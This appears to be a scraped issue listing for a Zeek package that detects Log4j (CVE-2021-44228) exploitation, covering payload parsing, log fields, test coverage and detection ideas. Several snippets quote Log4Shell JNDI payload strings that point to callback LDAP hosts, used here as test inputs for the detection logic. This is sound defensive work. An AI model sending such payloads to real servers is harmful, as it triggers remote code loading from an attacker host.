cve-2021-44228
Log4j Exploit Detection Logic for Zeek
…stead of string. This will be useful for callback detections! 2) Updated the parse_payload function to account for DNS name in the callback URL. eg: jndi:ldap://baddomain.xyz:1289/exploit This will be useful...
It is very handy when hunting and doing IR to have the id_orig_h and id_resp_h (actually even the id_orig_p and id_resp_p) in the log4j.log as fields. This is in...
This is probably not a huge deal, however, I just wanted to comment that the field names `target_host` and `target_port` in the log4j.log at first blush seem a bit misleading/confusing,...
Things get hairy when there are multiple IP addresses _and_ the exploit URI doesn't have `//`. e.g.:

```
print(parse_payload("https://18.x.x.x:443/${jndi:ldap:/10.0.16.1:1389/Exploit}"));
print(parse_payload("https://18.x.x.x:443/${jndi:ldap://10.0.16.1:1389/Exploit}"));
...
~/code/cve-2021-44228 ben-jgj* ¡ zeek scripts
[uri=10.0.16.1:1389/Exploit, stem=10.0.16.1:1389, host=10.0.16.1, port_=1389]...
```
Improve test case coverage, primarily focused on: 1. Detecting exploit strings, and 2. Payload parsing. Internally we have logs of hits from various sensors. It would be worth extracting those...
Are fingerprinting certificates and/or JA3 and JA3S useful as a way to detect exploit over the LDAPS channel? Even if a robust detection is not possible due to a myriad...
In the case of DNS exfiltration, we could potentially watch DNS requests for items that match a regex based on AWS/GCP/etc keys/IDs, and other artefacts that could be exfilled by...
Would it be possible to add the history field to the log4j or notice log? This can be useful when threat hunting and be able to rule out an attempt...
Raise a notice when activity in conn is seen to IP:ports that have been used in payloads. Such activity would mean a successful exploit. Requires clusterization.
When a domain is used instead of an IP address in the payload, there will be a DNS lookup. Watch for lookups to these payload domains and flag with a...